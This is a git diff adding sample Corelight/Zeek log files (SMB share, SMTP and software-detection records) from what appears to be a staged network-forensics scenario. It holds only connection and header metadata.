+{"ts":"2018-08-03T23:39:01.310882Z","uid":"C4cMdr30cSbBpKtxH4","id.orig_h":"85.132.46.226","id.orig_p":62248,"id.resp_h":"10.0.0.11","id.resp_p":445,"path":"IPC$","service":"IPC","share_type":"PIPE"} +{"ts":"2018-08-03T23:39:02.812722Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"path":"\u005c\u005c172.16.1.7\u005cIPC$","service":"IPC","share_type":"PIPE"} +{"ts":"2018-08-03T23:39:02.812722Z","uid":"COGaRD3cM7jP2XFdy8","id.orig_h":"172.16.1.8","id.orig_p":38896,"id.resp_h":"172.16.1.7","id.resp_p":445,"path":"\u005c\u005c172.16.1.7\u005cMUSIC","service":"A:","native_file_system":"NTFS","share_type":"DISK"} +{"ts":"2018-08-03T23:39:02.806384Z","uid":"CEYfiD3mbXWS12t6c1","id.orig_h":"172.16.1.8","id.orig_p":38889,"id.resp_h":"172.16.1.7","id.resp_p":445,"path":"\u005c\u005c172.16.1.7\u005cIPC$","service":"IPC","share_type":"PIPE"} +{"ts":"2018-08-03T23:39:02.808066Z","uid":"C2QZER6w0F3Z8qPpa","id.orig_h":"172.16.1.8","id.orig_p":38888,"id.resp_h":"172.16.1.7","id.resp_p":445,"path":"\u005c\u005c172.16.1.7\u005cIPC$","service":"IPC","share_type":"PIPE"} +{"ts":"2018-08-03T23:39:02.805909Z","uid":"CPjVQz26XMOipsHhZj","id.orig_h":"172.16.1.8","id.orig_p":38886,"id.resp_h":"172.16.1.7","id.resp_p":445,"path":"\u005c\u005c172.16.1.7\u005cIPC$","service":"IPC","share_type":"PIPE"} +{"ts":"2018-08-03T23:39:02.810316Z","uid":"CtXGTtnwGhwiZGX4c","id.orig_h":"172.16.1.8","id.orig_p":38895,"id.resp_h":"172.16.1.7","id.resp_p":445,"path":"\u005c\u005c172.16.1.7\u005cIPC$","service":"IPC","share_type":"PIPE"} +{"ts":"2018-08-03T23:39:02.810316Z","uid":"CtXGTtnwGhwiZGX4c","id.orig_h":"172.16.1.8","id.orig_p":38895,"id.resp_h":"172.16.1.7","id.resp_p":445,"path":"\u005c\u005c172.16.1.7\u005cMUSIC","service":"A:","native_file_system":"NTFS","share_type":"DISK"} diff --git a/Sample Data/Custom/Corelight/smtp_20180803_16:37:37-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/smtp_20180803_16:37:37-16:40:00-0700.log_ new file mode 100644 index 0000000000..9d70ef720a --- /dev/null +++ b/Sample Data/Custom/Corelight/smtp_20180803_16:37:37-16:40:00-0700.log_ @@ -0,0 +1,20 @@ +{"ts":"2018-08-03T23:37:37.171811Z","uid":"CG5t5oYIO7O45XIxa","id.orig_h":"192.168.0.53","id.orig_p":1732,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"passwordnedxp","mailfrom":"ned.pwned.se@gmx.com","rcptto":["homer.pwned.se@gmx.com"],"date":"Mon, 9 Mar 2015 11:03:58 +0100","from":"\u0022Password Ned\u0022 ","to":[""],"msg_id":"<8501ED1263D742DFB6B601A139AA38EC@passwordnedxp>","subject":"I\u0027m on-diddly-line now!","last_reply":"250 <54E6F832004A05C2> Mail accepted","path":["81.236.55.3","192.168.0.53"],"user_agent":"Microsoft Outlook Express 6.00.2900.5512","tls":false,"fuids":["FcX3Ba14gjw2Ox1O2a","Fn8SZ32veOIKPH4Lnd"],"is_webmail":false} +{"ts":"2018-08-03T23:37:37.327841Z","uid":"ClQLJSY46P9GMuHL3","id.orig_h":"192.168.0.51","id.orig_p":35760,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"[192.168.0.51]","mailfrom":"homer.pwned.se@gmx.com","rcptto":["ned.pwned.se@gmx.com"],"date":"Mon, 09 Mar 2015 11:23:51 +0100","from":"Homer ","to":["ned.pwned.se@gmx.com"],"msg_id":"<54FD74B7.9030207@gmx.com>","subject":"Is this your email address Ned?","last_reply":"250 <54E6F832004A236E> Mail accepted","path":["81.236.55.3","192.168.0.51"],"user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0","tls":false,"fuids":["F31c0X3sf4jRCKSOe1"],"is_webmail":false} +{"ts":"2018-08-03T23:37:47.371541Z","uid":"CTTr0nPQ6E1JjA5y7","id.orig_h":"192.168.0.51","id.orig_p":36503,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"[192.168.0.51]","mailfrom":"homer.pwned.se@gmx.com","rcptto":["krusty.pwned.se@gmail.com"],"date":"Tue, 10 Mar 2015 11:42:34 +0100","from":"Homer ","to":["Krusty "],"msg_id":"<54FECA9A.3010901@gmx.com>","in_reply_to":"<003601d05b16$235b52a0$6a11f7e0$@gmail.com>","subject":"Re: ping","last_reply":"250 <54EF7C1F003226CA> Mail accepted","path":["81.236.55.3","192.168.0.51"],"user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0","tls":false,"fuids":["Fv5iTp47jRz0mmU4Sg","FqIVrR3soEI768tfH7"],"is_webmail":false} +{"ts":"2018-08-03T23:37:47.387587Z","uid":"CigXEz2RN1tz4fwek","id.orig_h":"192.168.0.51","id.orig_p":36504,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"[192.168.0.51]","mailfrom":"homer.pwned.se@gmx.com","rcptto":["ned.pwned.se@gmx.com"],"date":"Tue, 10 Mar 2015 11:43:32 +0100","from":"Homer ","to":["Password Ned "],"msg_id":"<54FECAD4.1040200@gmx.com>","in_reply_to":"<8501ED1263D742DFB6B601A139AA38EC@passwordnedxp>","subject":"Re: I\u0027m on-diddly-line now!","last_reply":"250 <54EF7C1F003228A8> Mail accepted","path":["81.236.55.3","192.168.0.51"],"user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0","tls":false,"fuids":["FJcHt74ingStvpe2zd","FSBmgM2mX1vffL6YH4"],"is_webmail":false} +{"ts":"2018-08-03T23:37:47.462657Z","uid":"CvGB5B4wntoWaM99L8","id.orig_h":"192.168.0.53","id.orig_p":1389,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"passwordnedxp","mailfrom":"ned.pwned.se@gmx.com","rcptto":["krusty.pwned.se@gmail.com"],"date":"Tue, 10 Mar 2015 11:50:11 +0100","from":"\u0022Password Ned\u0022 ","to":["\u0022Krusty\u0022 "],"msg_id":"<9E5DEC29980740E588D9E9D2DC68EA1D@passwordnedxp>","subject":"Re: First day at work","last_reply":"250 <54E6F832004FB417> Mail accepted","path":["81.236.55.3","192.168.0.53"],"user_agent":"Microsoft Outlook Express 6.00.2900.5512","tls":false,"fuids":["FsGOcw1v7TEjoqso0j","FP5LBp3LsRwAAs3snc"],"is_webmail":false} +{"ts":"2018-08-03T23:37:47.466516Z","uid":"C0cOW02ED11m69qvIh","id.orig_h":"192.168.0.51","id.orig_p":36547,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"[192.168.0.51]","mailfrom":"homer.pwned.se@gmx.com","rcptto":["ned.pwned.se@gmx.com"],"date":"Tue, 10 Mar 2015 11:54:56 +0100","from":"Homer ","to":["Password Ned "],"msg_id":"<54FECD80.10900@gmx.com>","subject":"Technical email delivery problems","last_reply":"250 <54E6F832004FBED6> Mail accepted","path":["81.236.55.3","192.168.0.51"],"user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0","tls":false,"fuids":["FmKZpk4mx8qwYnBnue"],"is_webmail":false} +{"ts":"2018-08-03T23:37:47.481971Z","uid":"Ckl1SE2EBxVhiqnk5","id.orig_h":"192.168.0.53","id.orig_p":1424,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"passwordnedxp","mailfrom":"ned.pwned.se@gmx.com","rcptto":["homer.pwned.se@gmx.com"],"date":"Tue, 10 Mar 2015 11:56:04 +0100","from":"\u0022Password Ned\u0022 ","to":["\u0022Homer\u0022 "],"msg_id":"","subject":"Re: Technical email delivery problems","last_reply":"250 <54EF7C1F0032472F> Mail accepted","path":["81.236.55.3","192.168.0.53"],"user_agent":"Microsoft Outlook Express 6.00.2900.5512","tls":false,"fuids":["FVlDdx1A42HZnWK7xh"],"is_webmail":false} +{"ts":"2018-08-03T23:37:46.243748Z","uid":"CRhf33MgzdWEWoAZ7","id.orig_h":"192.168.0.54","id.orig_p":49386,"id.resp_h":"64.233.165.109","id.resp_p":587,"trans_depth":1,"helo":"DellDator32","last_reply":"220 2.0.0 Ready to start TLS","path":["64.233.165.109","192.168.0.54"],"tls":true,"fuids":[],"is_webmail":false} +{"ts":"2018-08-03T23:37:46.241182Z","uid":"CZAFfo4SFB1keznsC6","id.orig_h":"192.168.0.54","id.orig_p":49385,"id.resp_h":"64.233.165.109","id.resp_p":587,"trans_depth":1,"helo":"DellDator32","last_reply":"220 2.0.0 Ready to start TLS","path":["64.233.165.109","192.168.0.54"],"tls":true,"fuids":[],"is_webmail":false} +{"ts":"2018-08-03T23:37:47.148881Z","uid":"CfX12i4yXoUjtxcOyh","id.orig_h":"192.168.0.54","id.orig_p":49571,"id.resp_h":"64.233.165.109","id.resp_p":587,"trans_depth":1,"helo":"DellDator32","last_reply":"220 2.0.0 Ready to start TLS","path":["64.233.165.109","192.168.0.54"],"tls":true,"fuids":[],"is_webmail":false} +{"ts":"2018-08-03T23:37:47.156977Z","uid":"CqLHTe4QCc5A0bXrWd","id.orig_h":"192.168.0.54","id.orig_p":49572,"id.resp_h":"64.233.165.109","id.resp_p":587,"trans_depth":1,"helo":"DellDator32","last_reply":"220 2.0.0 Ready to start TLS","path":["64.233.165.109","192.168.0.54"],"tls":true,"fuids":[],"is_webmail":false} +{"ts":"2018-08-03T23:37:54.545927Z","uid":"C7dt3I3EPGcL9Dfob3","id.orig_h":"192.168.0.53","id.orig_p":2153,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"passwordnedxp","mailfrom":"ned.pwned.se@gmx.com","rcptto":["homer.pwned.se@gmx.com"],"date":"Wed, 11 Mar 2015 13:20:11 +0100","from":"\u0022Password Ned\u0022 ","to":["\u0022Homer\u0022 "],"msg_id":"","subject":"Re: www.pwned.se now online","last_reply":"250 <54EF7C1F0039BECF> Mail accepted","path":["81.236.55.3","192.168.0.53"],"user_agent":"Microsoft Outlook Express 6.00.2900.5512","tls":false,"fuids":["FkYyUX3O20nQIB8Oej"],"is_webmail":false} +{"ts":"2018-08-03T23:38:01.446597Z","uid":"CvTrYj2scU7ZCC5pCe","id.orig_h":"192.168.0.53","id.orig_p":3706,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"passwordnedxp","mailfrom":"ned.pwned.se@gmx.com","rcptto":["d.knuth@hushmail.com"],"date":"Fri, 13 Mar 2015 14:01:05 +0100","from":"\u0022Password Ned\u0022 ","to":[""],"msg_id":"<5782CF072601423EAC2E00492D5218F4@passwordnedxp>","subject":"Re: I\u0027d like to purchase a secure password","last_reply":"250 <54E6F8320061B982> Mail accepted","path":["81.236.55.3","192.168.0.53"],"user_agent":"Microsoft Outlook Express 6.00.2900.5512","tls":false,"fuids":["FIsdVz2Dv4ezujWIn4","F0WUmi4UiEdfo1GSu3"],"is_webmail":false} +{"ts":"2018-08-03T23:38:01.560483Z","uid":"CPT5L914wmfDebfHsb","id.orig_h":"192.168.0.53","id.orig_p":3852,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"passwordnedxp","mailfrom":"ned.pwned.se@gmx.com","rcptto":["homer.pwned.se@gmx.com"],"date":"Fri, 13 Mar 2015 16:16:02 +0100","from":"\u0022Password Ned\u0022 ","to":["\u0022Homer\u0022 "],"msg_id":"<3DAC7AF9CE584CE293ED592C27084E16@passwordnedxp>","subject":"Fw: You\u0027re running a vulnerable version of SkyBlueCanvas","last_reply":"250 <54E6F832006275FE> Mail accepted","path":["81.236.55.3","192.168.0.53"],"user_agent":"Microsoft Outlook Express 6.00.2900.5512","tls":false,"fuids":["FZEZ0W15JFy6T7yl6e","FB5z1b1ruqnFdUigN3"],"is_webmail":false} +{"ts":"2018-08-03T23:38:05.518121Z","uid":"CG4WBv1YvP5xn6hJP5","id.orig_h":"192.168.0.51","id.orig_p":60362,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"[192.168.0.51]","mailfrom":"homer.pwned.se@gmx.com","rcptto":["krusty.pwned.se@gmail.com"],"date":"Tue, 17 Mar 2015 08:17:43 +0100","from":"Homer ","to":["Krusty "],"msg_id":"<5507D517.2010809@gmx.com>","in_reply_to":"<009501d05d7a$b933aff0$2b9b0fd0$@gmail.com>","subject":"Re: I\u0027ve got 61 problems but my job aint one","last_reply":"250 <54E6F832006D9D22> Mail accepted","path":["81.236.55.3","192.168.0.51"],"user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0","tls":false,"fuids":["F6UDerS2pfvei0KRb","FXrqL92XflpLEXVZ44","FgO5rW3M7VlUyIcCyd"],"is_webmail":false} +{"ts":"2018-08-03T23:38:05.546444Z","uid":"CaOpm4JpVQx9WPa7d","id.orig_h":"192.168.0.51","id.orig_p":60390,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"[192.168.0.51]","mailfrom":"homer.pwned.se@gmx.com","rcptto":["ned.pwned.se@gmx.com"],"date":"Tue, 17 Mar 2015 08:48:37 +0100","from":"Homer ","to":["Password Ned "],"msg_id":"<5507DC55.6090005@gmx.com>","in_reply_to":"<3EF8E091DB36430A96BC3A6C31A183F8@passwordnedxp>","subject":"Re: Fw: The frog is back!","last_reply":"250 <54EF7C1F00509EF1> Mail accepted","path":["81.236.55.3","192.168.0.51"],"user_agent":"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Thunderbird/31.2.0","tls":false,"fuids":["FakMHq1PsByTwuXldh","FsjHdk229asuLxBht6"],"is_webmail":false} +{"ts":"2018-08-03T23:38:05.534084Z","uid":"Cka4Bv1qmbA1RTFF53","id.orig_h":"192.168.0.53","id.orig_p":1289,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"passwordnedxp","mailfrom":"ned.pwned.se@gmx.com","rcptto":["homer.pwned.se@gmx.com"],"date":"Tue, 17 Mar 2015 08:30:26 +0100","from":"\u0022Password Ned\u0022 ","to":["\u0022Homer\u0022 "],"msg_id":"<3EF8E091DB36430A96BC3A6C31A183F8@passwordnedxp>","subject":"Fw: The frog is back!","last_reply":"250 <54EF7C1F00507F60> Mail accepted","path":["81.236.55.3","192.168.0.53"],"user_agent":"Microsoft Outlook Express 6.00.2900.5512","tls":false,"fuids":["FfJJQ74pDIlEgQWhGf","FzVjQqYsRcLYhdctg","FqnOzl4JMMdMrbOt72"],"is_webmail":false} +{"ts":"2018-08-03T23:38:07.634540Z","uid":"C6o9LOw6TqD2qMLEc","id.orig_h":"192.168.0.53","id.orig_p":1322,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"passwordnedxp","mailfrom":"ned.pwned.se@gmx.com","rcptto":["ed.dijkstra@yahoo.com","homer.pwned.se@gmx.com"],"date":"Tue, 17 Mar 2015 10:15:02 +0100","from":"\u0022Password Ned\u0022 ","to":["\u0022Edsger Dijkstra\u0022 "],"msg_id":"<82576B8A45B540B7BF165BEF67BB02C5@passwordnedxp>","subject":"Re: The frog is back!","last_reply":"250 <54E6F832006E937A> Mail accepted","path":["81.236.55.3","192.168.0.53"],"user_agent":"Microsoft Outlook Express 6.00.2900.5512","tls":false,"fuids":["FvPQjWWCYLJefchUh","FzpSIF3VtoCmG9x903"],"is_webmail":false} +{"ts":"2018-08-03T23:38:12.367493Z","uid":"C5yXAv453aG4WkzlBj","id.orig_h":"192.168.0.53","id.orig_p":1283,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"passwordnedxp","mailfrom":"ned.pwned.se@gmx.com","rcptto":["homer.pwned.se@gmx.com","krusty.pwned.se@gmail.com"],"date":"Thu, 19 Mar 2015 12:42:06 +0100","from":"\u0022Password Ned\u0022 ","to":["\u0022Homer\u0022 "],"cc":["\u0022Krusty\u0022 "],"msg_id":"","subject":"Fw: My password has leaked online","last_reply":"250 <54EF7C1F005E0201> Mail accepted","path":["81.236.55.3","192.168.0.53"],"user_agent":"Microsoft Outlook Express 6.00.2900.5512","tls":false,"fuids":["FaliahTGJHuhFeWt2","FcR4TLdk7gJDb6h9k"],"is_webmail":false} +{"ts":"2018-08-03T23:38:48.973457Z","uid":"CEH0pi3rUh8dJO0Agj","id.orig_h":"192.168.0.53","id.orig_p":2370,"id.resp_h":"81.236.55.3","id.resp_p":25,"trans_depth":1,"helo":"passwordnedxp","mailfrom":"ned.pwned.se@gmx.com","rcptto":["homer.pwned.se@gmx.com","krusty.pwned.se@gmail.com"],"date":"Tue, 7 Apr 2015 15:36:29 +0200","from":"\u0022Password Ned\u0022 ","to":["\u0022Krusty\u0022 ",""],"msg_id":"<5E99EDAF8CAE4C34862FF55486CB99C5@passwordnedxp>","subject":"Re: Krusty, unable to deliver your item, #00000529832","last_reply":"250 <54EF7C1F00AD3590> Mail accepted","path":["81.236.55.3","192.168.0.53"],"user_agent":"Microsoft Outlook Express 6.00.2900.5512","tls":false,"fuids":["FS5nuj3XkXvMebrmdb","FPxQhPcrO0yOQFbh9"],"is_webmail":false} diff --git a/Sample Data/Custom/Corelight/software_20180803_16:37:08-16:40:00-0700.log_ b/Sample Data/Custom/Corelight/software_20180803_16:37:08-16:40:00-0700.log_ new file mode 100644 index 0000000000..33d3888a36 --- /dev/null +++ b/Sample Data/Custom/Corelight/software_20180803_16:37:08-16:40:00-0700.log_ @@ -0,0 +1,590 @@ +{"ts":"2018-08-03T23:37:08.224660Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.221013Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.135933Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.212009Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.225153Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.216842Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.215193Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.225348Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.140338Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.214151Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.238210Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.233939Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.213239Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.223239Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.229640Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.220465Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.221991Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:08.300539Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Debian APT-HTTP","version.major":1,"version.minor":3,"version.addl":"1.0.9.2ubuntu2","unparsed_version":"Debian APT-HTTP/1.3 (1.0.9.2ubuntu2)"} +{"ts":"2018-08-03T23:37:08.298983Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Debian APT-HTTP","version.major":1,"version.minor":3,"version.addl":"1.0.9.2ubuntu2","unparsed_version":"Debian APT-HTTP/1.3 (1.0.9.2ubuntu2)"} +{"ts":"2018-08-03T23:37:08.946948Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:08.942254Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:08.944185Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:08.945490Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:08.942324Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:08.943930Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:08.225965Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Firefox","version.major":33,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0"} +{"ts":"2018-08-03T23:37:09.210101Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:08.302283Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Debian APT-HTTP","version.major":1,"version.minor":3,"version.addl":"1.0.9.2ubuntu2","unparsed_version":"Debian APT-HTTP/1.3 (1.0.9.2ubuntu2)"} +{"ts":"2018-08-03T23:37:08.943739Z","host":"192.168.0.51","software_type":"HTTP::BROWSER","name":"Python-urllib","version.major":3,"version.minor":4,"unparsed_version":"Python-urllib/3.4"} +{"ts":"2018-08-03T23:37:08.943739Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:09.269654Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:09.725366Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:09.718747Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:09.726824Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:09.737355Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:09.780485Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:09.755739Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:09.727657Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:09.783893Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:09.725283Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"urlgrabber","version.major":3,"version.minor":10,"version.addl":"yum/3","unparsed_version":"urlgrabber/3.10 yum/3.4.3"} +{"ts":"2018-08-03T23:37:11.274584Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:11.270268Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:11.275172Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:11.276545Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:11.939423Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} +{"ts":"2018-08-03T23:37:11.275532Z","host":"192.168.0.2","software_type":"HTTP::BROWSER","name":"Firefox","version.major":24,"version.minor":0,"unparsed_version":"Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"} 